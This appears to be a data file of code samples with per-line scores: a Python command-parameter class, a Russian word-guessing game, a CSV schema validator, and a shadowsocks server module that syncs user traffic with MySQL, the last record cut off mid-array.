""" Module containing the ParamPipe class. A ParamPipe object is created for every SmartCommand. In it is defined the list of expected parameters to be used. The 'add' method is probably the most useful one, and you should use it in the 'setup' method of your class inheriting 'SmartCommand'. """ from commands.parameters.list import DICT_PARAM class ParamPipe(object): """A parameter pipe, defined in every SmartCommand. A parameter pipe (ParamPipe) is used to store a list of parameters with various rules: type, default value, mandatory presence and grouping should eventually be supported. A ParamPipe object is created for every SmartCommand which can add parameters to it. When a SmartCommand is called, it uses the 'parse' method of ParamPipe to 'parse' a string into a list of interpreted parameters. Parameers are defined in the same package ('commands.parameters'). The 'add' method is used to add new parameters to the pipe. Further customization is still possible, using the returned parameter object. """ def __init__(self): self._parameters = [] self._groups = [] def add(self, ptype, default=None): """Add a new parameter. Expected arguments: ptype -- the type of parameter (str) default -- the default value of this parameter if not specified If 'default' is left to None, or set to None, the created parameter will assume it's mandatory (it has to be specified). Use a different default value to specify 'no value' (an empty string, for isntance). """ pclass = DICT_PARAM.get(ptype) if pclass is None: raise ValueError("the parameter type {} doesn't exist".format( repr(ptype))) # Create the parameter object parameter = pclass() parameter.default = default self._parameters.append(parameter) return parameter def parse(self, command): """Parse the specified args. This is a very simple implementation for the time being. """ args = command.args for parameter in self._parameters: args = parameter.parse(command, args)
[ "\"\"\"\n", "Module containing the ParamPipe class.\n", "\n", "A ParamPipe object is created for every SmartCommand. In it\n", "is defined the list of expected parameters to be used. The\n", "'add' method is probably the most useful one, and you should\n", "use it in the 'setup' method of your class inheriting\n", "'SmartCommand'.\n", "\n", "\"\"\"\n", "\n", "from commands.parameters.list import DICT_PARAM\n", "\n", "class ParamPipe(object):\n", "\n", " \"\"\"A parameter pipe, defined in every SmartCommand.\n", "\n", " A parameter pipe (ParamPipe) is used to store a list of\n", " parameters with various rules: type, default value,\n", " mandatory presence and grouping should eventually be\n", " supported. A ParamPipe object is created for every\n", " SmartCommand which can add parameters to it. When a\n", " SmartCommand is called, it uses the 'parse' method of\n", " ParamPipe to 'parse' a string into a list of interpreted\n", " parameters.\n", "\n", " Parameers are defined in the same package\n", " ('commands.parameters'). The 'add' method is used to add\n", " new parameters to the pipe. Further customization is still\n", " possible, using the returned parameter object.\n", "\n", " \"\"\"\n", "\n", " def __init__(self):\n", " self._parameters = []\n", " self._groups = []\n", "\n", " def add(self, ptype, default=None):\n", " \"\"\"Add a new parameter.\n", "\n", " Expected arguments:\n", " ptype -- the type of parameter (str)\n", " default -- the default value of this parameter if not specified\n", "\n", " If 'default' is left to None, or set to None, the\n", " created parameter will assume it's mandatory (it has to\n", " be specified). 
Use a different default value to\n", " specify 'no value' (an empty string, for isntance).\n", "\n", " \"\"\"\n", " pclass = DICT_PARAM.get(ptype)\n", " if pclass is None:\n", " raise ValueError(\"the parameter type {} doesn't exist\".format(\n", " repr(ptype)))\n", "\n", " # Create the parameter object\n", " parameter = pclass()\n", " parameter.default = default\n", " self._parameters.append(parameter)\n", " return parameter\n", "\n", " def parse(self, command):\n", " \"\"\"Parse the specified args.\n", "\n", " This is a very simple implementation for the time being.\n", "\n", " \"\"\"\n", " args = command.args\n", " for parameter in self._parameters:\n", " args = parameter.parse(command, args)\n" ]
[ 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0.04, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0 ]
70
0.000571
false
# Задача 9 # Создайте игру, в которой компьютер выбирает какое-либо слово, а игрок должен #его отгадать. Компьютер сообщает игроку, сколько букв в слове, и дает пять попыток #узнать, есть ли какая-либо буква в слове, причем программа может отвечать только #"Да" и "Нет". Вслед за тем игрок должен попробовать отгадать слово. # Dnilenkov M.A. import random spisokWord = ("собака", "автор", "волна", "скрипт", "лестница", "гиря", "физика") zagadka = random.choice(spisokWord) print ("Длина слова - ", len(zagadka)) for i in range(5): print("\n") userLeter = input ("Введите букву - ") if userLeter in zagadka: print ("Да") else: print ("Нет") if (input("\nВведите ответ - ") == zagadka): print ("Молодец") else: print ("Потом повезет") print (zagadka) input ("\n Нажмите ENTER для выхода")
[ "# Задача 9\n", "# Создайте игру, в которой компьютер выбирает какое-либо слово, а игрок должен\n", "#его отгадать. Компьютер сообщает игроку, сколько букв в слове, и дает пять попыток\n", "#узнать, есть ли какая-либо буква в слове, причем программа может отвечать только\n", "#\"Да\" и \"Нет\". Вслед за тем игрок должен попробовать отгадать слово.\n", "# Dnilenkov M.A.\n", "\n", "import random\n", "\n", "spisokWord = (\"собака\", \"автор\", \"волна\", \"скрипт\", \"лестница\", \"гиря\", \"физика\")\n", "zagadka = random.choice(spisokWord)\n", "\n", "print (\"Длина слова - \", len(zagadka))\n", "\n", "for i in range(5):\n", " print(\"\\n\")\n", " userLeter = input (\"Введите букву - \")\n", " if userLeter in zagadka:\n", " print (\"Да\")\n", " else:\n", " print (\"Нет\")\n", "\n", " \n", "if (input(\"\\nВведите ответ - \") == zagadka):\n", " print (\"Молодец\")\n", "else:\n", " print (\"Потом повезет\")\n", " print (zagadka)\n", "\n", "input (\"\\n Нажмите ENTER для выхода\")\n" ]
[ 0, 0, 0.023809523809523808, 0.024390243902439025, 0.014492753623188406, 0, 0, 0, 0, 0.012195121951219513, 0, 0, 0.02564102564102564, 0, 0, 0, 0.023255813953488372, 0, 0.047619047619047616, 0, 0.045454545454545456, 0, 0.2, 0, 0.045454545454545456, 0, 0.03571428571428571, 0.05, 0, 0.02631578947368421 ]
30
0.019145
false
import ntpath import simplejson import csv_parser def validate_file(csv_file_path, schema_file_path): csv_handle = open(csv_file_path, 'rb') csv_file_name = ntpath.basename(csv_file_path) schema_handle = open(schema_file_path, 'rb') return validate_handle(csv_handle, csv_file_name, schema_handle) def validate_handle(csv_handle, csv_file_name, schema_handle): table, embedded_schema = csv_parser.parse(csv_handle, None) schema = simplejson.load(schema_handle) tableSchema = None if "tables" in schema: talbes = schema["tables"] for i, current_table in enumerate(talbes): if "url" in current_table and current_table["url"] == csv_file_name: tableSchema = current_table break else: tableSchema = schema if not tableSchema: return (False, "Could not find schema for table %s: " % csv_file_name ) valid, error_message = validate_columns_name(embedded_schema, tableSchema) if valid: return validate_table_data(table, tableSchema) else: return valid, error_message def validate_columns_name(embedded_schema, schema): columns_in_table = embedded_schema["tableSchema"]["columns"] columns_in_schema = schema["tableSchema"]["columns"] valid = True; error_message = "" if len(columns_in_schema) != len(columns_in_table): error_message += "Column number mismatch! 
Csv has %s columns, but schema has %s columns.\n" % (len(columns_in_table), len(columns_in_schema)) return (False, error_message) for i, column in enumerate(columns_in_schema): if "name" in column and not column["name"] in columns_in_table[i]["titles"]: error_message += "Column: %s defined in schema, but not found in csv table!\n" % column["name"] valid = False return (valid, error_message) def validate_table_data(table, schema): table_schema = schema["tableSchema"] columns_in_schema = table_schema["columns"] valid = True; error_message = "" pk_value_set = set() pk_column_list = list() if "primaryKey" in table_schema: pk_json = table_schema["primaryKey"] if pk_json: if isinstance(pk_json, list): pk_column_list = pk_json else: pk_column_list.append(pk_json); pk_column_index_list = get_column_index(columns_in_schema, pk_column_list) for row in table.rows: # check required for i, cell in enumerate(row.cells): if not cell.value: column = columns_in_schema[i] if "required" in column and column["required"]==True: error_message += "Error in %s: Column %s is required!\n" % (str(cell), column["name"]) valid = False # check primary key if len(pk_column_index_list) > 0: pk_value = concatenate_pk_value(row, pk_column_index_list) if pk_value in pk_value_set: valid = False error_message += "Error in %s: duplicated value: %s for primary key columns: %s\n" % (str(row), pk_value, pk_column_list) else: pk_value_set.add(pk_value) return (valid, error_message) def concatenate_pk_value(row, pk_column_index_list): value_list = list() for cell in row.cells: if cell.column.number in pk_column_index_list: value_list.append(cell.value) pk_value_tuple = tuple(value_list) return pk_value_tuple def get_column_index(columns_in_schema, pk_column_list): pk_column_index_list = list() for i, column in enumerate(columns_in_schema): if column["name"] in pk_column_list: pk_column_index_list.append(i+1) return pk_column_index_list def test_validate(): table_path = 
"F:\WorkRecord\Feature\MCT\CsvSchema\AdyenAcquirerCode.csv" schema_path = "F:\WorkRecord\Feature\MCT\CsvSchema\AdyenAcquirerCode.schema" (ret, error_message) = validate_file(table_path, schema_path) print("Is valid: %s\nError message: \n%s\n" % (ret, error_message)) if __name__ == '__main__': test_validate()
[ "import ntpath\n", "import simplejson\n", "import csv_parser\n", "\n", "def validate_file(csv_file_path, schema_file_path):\n", " csv_handle = open(csv_file_path, 'rb')\n", " csv_file_name = ntpath.basename(csv_file_path)\n", " schema_handle = open(schema_file_path, 'rb')\n", " return validate_handle(csv_handle, csv_file_name, schema_handle)\n", " \n", "\n", "def validate_handle(csv_handle, csv_file_name, schema_handle):\n", " table, embedded_schema = csv_parser.parse(csv_handle, None)\n", " schema = simplejson.load(schema_handle)\n", " tableSchema = None\n", " if \"tables\" in schema:\n", " talbes = schema[\"tables\"]\n", " for i, current_table in enumerate(talbes):\n", " if \"url\" in current_table and current_table[\"url\"] == csv_file_name:\n", " tableSchema = current_table\n", " break\n", " else:\n", " tableSchema = schema\n", " \n", " if not tableSchema:\n", " return (False, \"Could not find schema for table %s: \" % csv_file_name )\n", " \n", " valid, error_message = validate_columns_name(embedded_schema, tableSchema)\n", " if valid:\n", " return validate_table_data(table, tableSchema)\n", " else:\n", " return valid, error_message\n", "\n", "def validate_columns_name(embedded_schema, schema):\n", " columns_in_table = embedded_schema[\"tableSchema\"][\"columns\"]\n", " columns_in_schema = schema[\"tableSchema\"][\"columns\"]\n", " \n", " valid = True; \n", " error_message = \"\"\n", " if len(columns_in_schema) != len(columns_in_table):\n", " error_message += \"Column number mismatch! 
Csv has %s columns, but schema has %s columns.\\n\" % (len(columns_in_table), len(columns_in_schema))\n", " return (False, error_message) \n", " \n", " for i, column in enumerate(columns_in_schema):\n", " if \"name\" in column and not column[\"name\"] in columns_in_table[i][\"titles\"]:\n", " error_message += \"Column: %s defined in schema, but not found in csv table!\\n\" % column[\"name\"]\n", " valid = False\n", " \n", " return (valid, error_message)\n", "\n", "def validate_table_data(table, schema):\n", " table_schema = schema[\"tableSchema\"]\n", " columns_in_schema = table_schema[\"columns\"]\n", " \n", " valid = True; \n", " error_message = \"\" \n", " pk_value_set = set()\n", "\n", " pk_column_list = list()\n", " if \"primaryKey\" in table_schema:\n", " pk_json = table_schema[\"primaryKey\"]\n", " if pk_json:\n", " if isinstance(pk_json, list):\n", " pk_column_list = pk_json\n", " else:\n", " pk_column_list.append(pk_json); \n", " pk_column_index_list = get_column_index(columns_in_schema, pk_column_list)\n", "\n", " for row in table.rows:\n", " # check required\n", " for i, cell in enumerate(row.cells):\n", " if not cell.value:\n", " column = columns_in_schema[i]\n", " if \"required\" in column and column[\"required\"]==True:\n", " error_message += \"Error in %s: Column %s is required!\\n\" % (str(cell), column[\"name\"])\n", " valid = False\n", " # check primary key\n", " if len(pk_column_index_list) > 0:\n", " pk_value = concatenate_pk_value(row, pk_column_index_list)\n", " if pk_value in pk_value_set:\n", " valid = False\n", " error_message += \"Error in %s: duplicated value: %s for primary key columns: %s\\n\" % (str(row), pk_value, pk_column_list)\n", " else:\n", " pk_value_set.add(pk_value)\n", "\n", " return (valid, error_message)\n", "\n", "def concatenate_pk_value(row, pk_column_index_list):\n", " value_list = list()\n", " for cell in row.cells:\n", " if cell.column.number in pk_column_index_list:\n", " value_list.append(cell.value) \n", " 
pk_value_tuple = tuple(value_list)\n", " return pk_value_tuple\n", "\n", "def get_column_index(columns_in_schema, pk_column_list):\n", " pk_column_index_list = list()\n", " for i, column in enumerate(columns_in_schema):\n", " if column[\"name\"] in pk_column_list:\n", " pk_column_index_list.append(i+1)\n", " \n", " return pk_column_index_list\n", "\n", "\n", "def test_validate():\n", " table_path = \"F:\\WorkRecord\\Feature\\MCT\\CsvSchema\\AdyenAcquirerCode.csv\"\n", " schema_path = \"F:\\WorkRecord\\Feature\\MCT\\CsvSchema\\AdyenAcquirerCode.schema\"\n", " (ret, error_message) = validate_file(table_path, schema_path)\n", " print(\"Is valid: %s\\nError message: \\n%s\\n\" % (ret, error_message))\n", " \n", "\n", " \n", "if __name__ == '__main__':\n", " test_validate()\n", "\n" ]
[ 0, 0, 0, 0, 0.019230769230769232, 0, 0, 0, 0, 0.2, 0, 0, 0, 0, 0, 0, 0, 0, 0.012345679012345678, 0, 0, 0, 0, 0.2, 0, 0.0125, 0.2, 0, 0, 0, 0, 0, 0, 0.019230769230769232, 0, 0, 0.2, 0.09090909090909091, 0, 0, 0.006666666666666667, 0.006289308176100629, 0.2, 0, 0.011764705882352941, 0.009259259259259259, 0, 0.1111111111111111, 0, 0, 0.025, 0, 0, 0.2, 0.09090909090909091, 0.0072992700729927005, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0.04081632653061224, 0, 0, 0, 0, 0, 0, 0, 0.02857142857142857, 0.009259259259259259, 0, 0, 0, 0, 0, 0, 0.007246376811594203, 0, 0, 0, 0, 0, 0.018867924528301886, 0, 0, 0.01694915254237288, 0.02127659574468085, 0, 0, 0, 0.017543859649122806, 0, 0, 0, 0, 0.2, 0, 0, 0, 0, 0.06493506493506493, 0.07407407407407407, 0, 0, 0.09090909090909091, 0, 0.2, 0.037037037037037035, 0, 1 ]
115
0.03
false
#!/usr/bin/python # -*- coding: UTF-8 -*- import logging import time import sys from server_pool import ServerPool import traceback from shadowsocks import common, shell, lru_cache from configloader import load_config, get_config import importloader switchrule = None db_instance = None class TransferBase(object): def __init__(self): import threading self.event = threading.Event() self.key_list = ['port', 'u', 'd', 'transfer_enable', 'passwd', 'enable'] self.last_get_transfer = {} self.last_update_transfer = {} self.user_pass = {} self.port_uid_table = {} self.onlineuser_cache = lru_cache.LRUCache(timeout=60*30) self.pull_ok = False def load_cfg(self): pass def push_db_all_user(self): if self.pull_ok is False: return #更新用户流量到数据库 last_transfer = self.last_update_transfer curr_transfer = ServerPool.get_instance().get_servers_transfer() #上次和本次的增量 dt_transfer = {} for id in curr_transfer.keys(): if id in last_transfer: if curr_transfer[id][0] + curr_transfer[id][1] - last_transfer[id][0] - last_transfer[id][1] <= 0: continue if last_transfer[id][0] <= curr_transfer[id][0] and \ last_transfer[id][1] <= curr_transfer[id][1]: dt_transfer[id] = [curr_transfer[id][0] - last_transfer[id][0], curr_transfer[id][1] - last_transfer[id][1]] else: dt_transfer[id] = [curr_transfer[id][0], curr_transfer[id][1]] else: if curr_transfer[id][0] + curr_transfer[id][1] <= 0: continue dt_transfer[id] = [curr_transfer[id][0], curr_transfer[id][1]] if id in self.last_get_transfer: if curr_transfer[id][0] + curr_transfer[id][1] > self.last_get_transfer[id][0] + self.last_get_transfer[id][1]: self.onlineuser_cache[id] = curr_transfer[id][0] + curr_transfer[id][1] else: self.onlineuser_cache[id] = curr_transfer[id][0] + curr_transfer[id][1] self.onlineuser_cache.sweep() update_transfer = self.update_all_user(dt_transfer) for id in update_transfer.keys(): last = self.last_update_transfer.get(id, [0,0]) self.last_update_transfer[id] = [last[0] + update_transfer[id][0], last[1] + 
update_transfer[id][1]] self.last_get_transfer = curr_transfer def del_server_out_of_bound_safe(self, last_rows, rows): #停止超流量的服务 #启动没超流量的服务 try: switchrule = importloader.load('switchrule') except Exception as e: logging.error('load switchrule.py fail') cur_servers = {} new_servers = {} for row in rows: try: allow = switchrule.isTurnOn(row) and row['enable'] == 1 and row['u'] + row['d'] < row['transfer_enable'] except Exception as e: allow = False port = row['port'] passwd = common.to_bytes(row['passwd']) cfg = {'password': passwd} if 'id' in row: self.port_uid_table[row['port']] = row['id'] read_config_keys = ['method', 'obfs', 'obfs_param', 'protocol', 'protocol_param', 'forbidden_ip', 'forbidden_port'] for name in read_config_keys: if name in row and row[name]: cfg[name] = row[name] merge_config_keys = ['password'] + read_config_keys for name in cfg.keys(): if hasattr(cfg[name], 'encode'): cfg[name] = cfg[name].encode('utf-8') if port not in cur_servers: cur_servers[port] = passwd else: logging.error('more than one user use the same port [%s]' % (port,)) continue if ServerPool.get_instance().server_is_run(port) > 0: if not allow: logging.info('db stop server at port [%s]' % (port,)) ServerPool.get_instance().cb_del_server(port) else: cfgchange = False if port in ServerPool.get_instance().tcp_servers_pool: relay = ServerPool.get_instance().tcp_servers_pool[port] for name in merge_config_keys: if name in cfg and not self.cmp(cfg[name], relay._config[name]): cfgchange = True break; if not cfgchange and port in ServerPool.get_instance().tcp_ipv6_servers_pool: relay = ServerPool.get_instance().tcp_ipv6_servers_pool[port] for name in merge_config_keys: if name in cfg and not self.cmp(cfg[name], relay._config[name]): cfgchange = True break; #config changed if cfgchange: logging.info('db stop server at port [%s] reason: config changed: %s' % (port, cfg)) ServerPool.get_instance().cb_del_server(port) new_servers[port] = (passwd, cfg) elif allow and 
ServerPool.get_instance().server_run_status(port) is False: #new_servers[port] = passwd protocol = cfg.get('protocol', ServerPool.get_instance().config.get('protocol', 'origin')) obfs = cfg.get('obfs', ServerPool.get_instance().config.get('obfs', 'plain')) logging.info('db start server at port [%s] pass [%s] protocol [%s] obfs [%s]' % (port, passwd, protocol, obfs)) ServerPool.get_instance().new_server(port, cfg) for row in last_rows: if row['port'] in cur_servers: pass else: logging.info('db stop server at port [%s] reason: port not exist' % (row['port'])) ServerPool.get_instance().cb_del_server(row['port']) if row['port'] in self.port_uid_table: del self.port_uid_table[row['port']] if len(new_servers) > 0: from shadowsocks import eventloop self.event.wait(eventloop.TIMEOUT_PRECISION + eventloop.TIMEOUT_PRECISION / 2) for port in new_servers.keys(): passwd, cfg = new_servers[port] protocol = cfg.get('protocol', ServerPool.get_instance().config.get('protocol', 'origin')) obfs = cfg.get('obfs', ServerPool.get_instance().config.get('obfs', 'plain')) logging.info('db start server at port [%s] pass [%s] protocol [%s] obfs [%s]' % (port, passwd, protocol, obfs)) ServerPool.get_instance().new_server(port, cfg) def cmp(self, val1, val2): if type(val1) is bytes: val1 = common.to_str(val1) if type(val2) is bytes: val2 = common.to_str(val2) return val1 == val2 @staticmethod def del_servers(): for port in [v for v in ServerPool.get_instance().tcp_servers_pool.keys()]: if ServerPool.get_instance().server_is_run(port) > 0: ServerPool.get_instance().cb_del_server(port) for port in [v for v in ServerPool.get_instance().tcp_ipv6_servers_pool.keys()]: if ServerPool.get_instance().server_is_run(port) > 0: ServerPool.get_instance().cb_del_server(port) @staticmethod def thread_db(obj): import socket import time global db_instance timeout = 60 socket.setdefaulttimeout(timeout) last_rows = [] db_instance = obj() try: while True: load_config() db_instance.load_cfg() try: 
db_instance.push_db_all_user() rows = db_instance.pull_db_all_user() if rows: db_instance.pull_ok = True db_instance.del_server_out_of_bound_safe(last_rows, rows) last_rows = rows except Exception as e: trace = traceback.format_exc() logging.error(trace) #logging.warn('db thread except:%s' % e) if db_instance.event.wait(get_config().UPDATE_TIME) or not ServerPool.get_instance().thread.is_alive(): break except KeyboardInterrupt as e: pass db_instance.del_servers() ServerPool.get_instance().stop() db_instance = None @staticmethod def thread_db_stop(): global db_instance db_instance.event.set() class DbTransfer(TransferBase): def __init__(self): super(DbTransfer, self).__init__() self.cfg = { "host": "127.0.0.1", "port": 3306, "user": "ss", "password": "pass", "db": "shadowsocks", "node_id": 1, "transfer_mul": 1.0, "ssl_enable": 0, "ssl_ca": "", "ssl_cert": "", "ssl_key": ""} self.load_cfg() def load_cfg(self): import json config_path = get_config().MYSQL_CONFIG cfg = None with open(config_path, 'r+') as f: cfg = json.loads(f.read().decode('utf8')) if cfg: self.cfg.update(cfg) def update_all_user(self, dt_transfer): import cymysql update_transfer = {} query_head = 'UPDATE user' query_sub_when = '' query_sub_when2 = '' query_sub_in = None last_time = time.time() for id in dt_transfer.keys(): transfer = dt_transfer[id] update_trs = 1024 * max(2048 - self.user_pass.get(id, 0) * 64, 16) if transfer[0] + transfer[1] < update_trs: continue if id in self.user_pass: del self.user_pass[id] query_sub_when += ' WHEN %s THEN u+%s' % (id, int(transfer[0] * self.cfg["transfer_mul"])) query_sub_when2 += ' WHEN %s THEN d+%s' % (id, int(transfer[1] * self.cfg["transfer_mul"])) update_transfer[id] = transfer if query_sub_in is not None: query_sub_in += ',%s' % id else: query_sub_in = '%s' % id if query_sub_when == '': return update_transfer query_sql = query_head + ' SET u = CASE port' + query_sub_when + \ ' END, d = CASE port' + query_sub_when2 + \ ' END, t = ' + str(int(last_time)) + 
\ ' WHERE port IN (%s)' % query_sub_in if self.cfg["ssl_enable"] == 1: conn = cymysql.connect(host=self.cfg["host"], port=self.cfg["port"], user=self.cfg["user"], passwd=self.cfg["password"], db=self.cfg["db"], charset='utf8', ssl={'ca':self.cfg["ssl_enable"],'cert':self.cfg["ssl_enable"],'key':self.cfg["ssl_enable"]}) else: conn = cymysql.connect(host=self.cfg["host"], port=self.cfg["port"], user=self.cfg["user"], passwd=self.cfg["password"], db=self.cfg["db"], charset='utf8') cur = conn.cursor() cur.execute(query_sql) cur.close() conn.commit() conn.close() return update_transfer def pull_db_all_user(self): import cymysql #数据库所有用户信息 if self.cfg["ssl_enable"] == 1: conn = cymysql.connect(host=self.cfg["host"], port=self.cfg["port"], user=self.cfg["user"], passwd=self.cfg["password"], db=self.cfg["db"], charset='utf8', ssl={'ca':self.cfg["ssl_enable"],'cert':self.cfg["ssl_enable"],'key':self.cfg["ssl_enable"]}) else: conn = cymysql.connect(host=self.cfg["host"], port=self.cfg["port"], user=self.cfg["user"], passwd=self.cfg["password"], db=self.cfg["db"], charset='utf8') rows = self.pull_db_users(conn) conn.close() return rows def pull_db_users(self, conn): try: switchrule = importloader.load('switchrule') keys = switchrule.getKeys(self.key_list) except Exception as e: keys = self.key_list cur = conn.cursor() cur.execute("SELECT " + ','.join(keys) + " FROM user") rows = [] for r in cur.fetchall(): d = {} for column in range(len(keys)): d[keys[column]] = r[column] rows.append(d) cur.close() return rows class Dbv3Transfer(DbTransfer): def __init__(self): super(Dbv3Transfer, self).__init__() self.key_list += ['id', 'method'] if get_config().API_INTERFACE == 'sspanelv3ssr': self.key_list += ['obfs', 'protocol', 'obfs_param', 'protocol_param'] self.start_time = time.time() def update_all_user(self, dt_transfer): import cymysql update_transfer = {} query_head = 'UPDATE user' query_sub_when = '' query_sub_when2 = '' query_sub_in = None last_time = time.time() 
alive_user_count = len(self.onlineuser_cache) bandwidth_thistime = 0 if self.cfg["ssl_enable"] == 1: conn = cymysql.connect(host=self.cfg["host"], port=self.cfg["port"], user=self.cfg["user"], passwd=self.cfg["password"], db=self.cfg["db"], charset='utf8', ssl={'ca':self.cfg["ssl_enable"],'cert':self.cfg["ssl_enable"],'key':self.cfg["ssl_enable"]}) else: conn = cymysql.connect(host=self.cfg["host"], port=self.cfg["port"], user=self.cfg["user"], passwd=self.cfg["password"], db=self.cfg["db"], charset='utf8') conn.autocommit(True) for id in dt_transfer.keys(): transfer = dt_transfer[id] bandwidth_thistime = bandwidth_thistime + transfer[0] + transfer[1] update_trs = 1024 * max(2048 - self.user_pass.get(id, 0) * 64, 16) if transfer[0] + transfer[1] < update_trs: self.user_pass[id] = self.user_pass.get(id, 0) + 1 continue if id in self.user_pass: del self.user_pass[id] query_sub_when += ' WHEN %s THEN u+%s' % (id, int(transfer[0] * self.cfg["transfer_mul"])) query_sub_when2 += ' WHEN %s THEN d+%s' % (id, int(transfer[1] * self.cfg["transfer_mul"])) update_transfer[id] = transfer cur = conn.cursor() try: if id in self.port_uid_table: cur.execute("INSERT INTO `user_traffic_log` (`id`, `user_id`, `u`, `d`, `node_id`, `rate`, `traffic`, `log_time`) VALUES (NULL, '" + \ str(self.port_uid_table[id]) + "', '" + str(transfer[0]) + "', '" + str(transfer[1]) + "', '" + \ str(self.cfg["node_id"]) + "', '" + str(self.cfg["transfer_mul"]) + "', '" + \ self.traffic_format((transfer[0] + transfer[1]) * self.cfg["transfer_mul"]) + "', unix_timestamp()); ") except: logging.warn('no `user_traffic_log` in db') cur.close() if query_sub_in is not None: query_sub_in += ',%s' % id else: query_sub_in = '%s' % id if query_sub_when != '': query_sql = query_head + ' SET u = CASE port' + query_sub_when + \ ' END, d = CASE port' + query_sub_when2 + \ ' END, t = ' + str(int(last_time)) + \ ' WHERE port IN (%s)' % query_sub_in cur = conn.cursor() cur.execute(query_sql) cur.close() try: cur = 
conn.cursor() cur.execute("INSERT INTO `ss_node_online_log` (`id`, `node_id`, `online_user`, `log_time`) VALUES (NULL, '" + \ str(self.cfg["node_id"]) + "', '" + str(alive_user_count) + "', unix_timestamp()); ") cur.close() cur = conn.cursor() cur.execute("INSERT INTO `ss_node_info_log` (`id`, `node_id`, `uptime`, `load`, `log_time`) VALUES (NULL, '" + \ str(self.cfg["node_id"]) + "', '" + str(self.uptime()) + "', '" + \ str(self.load()) + "', unix_timestamp()); ") cur.close() except: logging.warn('no `ss_node_online_log` or `ss_node_info_log` in db') conn.close() return update_transfer def pull_db_users(self, conn): try: switchrule = importloader.load('switchrule') keys = switchrule.getKeys(self.key_list) except Exception as e: keys = self.key_list cur = conn.cursor() node_info_keys = ['traffic_rate'] cur.execute("SELECT " + ','.join(node_info_keys) +" FROM ss_node where `id`='" + str(self.cfg["node_id"]) + "'") nodeinfo = cur.fetchone() if nodeinfo == None: rows = [] cur.close() conn.commit() return rows cur.close() node_info_dict = {} for column in range(len(nodeinfo)): node_info_dict[node_info_keys[column]] = nodeinfo[column] self.cfg['transfer_mul'] = float(node_info_dict['traffic_rate']) cur = conn.cursor() cur.execute("SELECT " + ','.join(keys) + " FROM user") rows = [] for r in cur.fetchall(): d = {} for column in range(len(keys)): d[keys[column]] = r[column] rows.append(d) cur.close() return rows def load(self): import os return os.popen("cat /proc/loadavg | awk '{ print $1\" \"$2\" \"$3 }'").readlines()[0] def uptime(self): return time.time() - self.start_time def traffic_format(self, traffic): if traffic < 1024 * 8: return str(int(traffic)) + "B"; if traffic < 1024 * 1024 * 2: return str(round((traffic / 1024.0), 2)) + "KB"; return str(round((traffic / 1048576.0), 2)) + "MB"; class MuJsonTransfer(TransferBase): def __init__(self): super(MuJsonTransfer, self).__init__() def update_all_user(self, dt_transfer): import json rows = None config_path = 
get_config().MUDB_FILE with open(config_path, 'rb+') as f: rows = json.loads(f.read().decode('utf8')) for row in rows: if "port" in row: port = row["port"] if port in dt_transfer: row["u"] += dt_transfer[port][0] row["d"] += dt_transfer[port][1] if rows: output = json.dumps(rows, sort_keys=True, indent=4, separators=(',', ': ')) with open(config_path, 'r+') as f: f.write(output) f.truncate() return dt_transfer def pull_db_all_user(self): import json rows = None config_path = get_config().MUDB_FILE with open(config_path, 'rb+') as f: rows = json.loads(f.read().decode('utf8')) for row in rows: try: if 'forbidden_ip' in row: row['forbidden_ip'] = common.IPNetwork(row['forbidden_ip']) except Exception as e: logging.error(e) try: if 'forbidden_port' in row: row['forbidden_port'] = common.PortRange(row['forbidden_port']) except Exception as e: logging.error(e) return rows
[ "#!/usr/bin/python\n", "# -*- coding: UTF-8 -*-\n", "\n", "import logging\n", "import time\n", "import sys\n", "from server_pool import ServerPool\n", "import traceback\n", "from shadowsocks import common, shell, lru_cache\n", "from configloader import load_config, get_config\n", "import importloader\n", "\n", "switchrule = None\n", "db_instance = None\n", "\n", "class TransferBase(object):\n", "\tdef __init__(self):\n", "\t\timport threading\n", "\t\tself.event = threading.Event()\n", "\t\tself.key_list = ['port', 'u', 'd', 'transfer_enable', 'passwd', 'enable']\n", "\t\tself.last_get_transfer = {}\n", "\t\tself.last_update_transfer = {}\n", "\t\tself.user_pass = {}\n", "\t\tself.port_uid_table = {}\n", "\t\tself.onlineuser_cache = lru_cache.LRUCache(timeout=60*30)\n", "\t\tself.pull_ok = False\n", "\n", "\tdef load_cfg(self):\n", "\t\tpass\n", "\n", "\tdef push_db_all_user(self):\n", "\t\tif self.pull_ok is False:\n", "\t\t\treturn\n", "\t\t#更新用户流量到数据库\n", "\t\tlast_transfer = self.last_update_transfer\n", "\t\tcurr_transfer = ServerPool.get_instance().get_servers_transfer()\n", "\t\t#上次和本次的增量\n", "\t\tdt_transfer = {}\n", "\t\tfor id in curr_transfer.keys():\n", "\t\t\tif id in last_transfer:\n", "\t\t\t\tif curr_transfer[id][0] + curr_transfer[id][1] - last_transfer[id][0] - last_transfer[id][1] <= 0:\n", "\t\t\t\t\tcontinue\n", "\t\t\t\tif last_transfer[id][0] <= curr_transfer[id][0] and \\\n", "\t\t\t\t\t\tlast_transfer[id][1] <= curr_transfer[id][1]:\n", "\t\t\t\t\tdt_transfer[id] = [curr_transfer[id][0] - last_transfer[id][0],\n", "\t\t\t\t\t\t\t\t\t\tcurr_transfer[id][1] - last_transfer[id][1]]\n", "\t\t\t\telse:\n", "\t\t\t\t\tdt_transfer[id] = [curr_transfer[id][0], curr_transfer[id][1]]\n", "\t\t\telse:\n", "\t\t\t\tif curr_transfer[id][0] + curr_transfer[id][1] <= 0:\n", "\t\t\t\t\tcontinue\n", "\t\t\t\tdt_transfer[id] = [curr_transfer[id][0], curr_transfer[id][1]]\n", "\t\t\tif id in self.last_get_transfer:\n", "\t\t\t\tif curr_transfer[id][0] + 
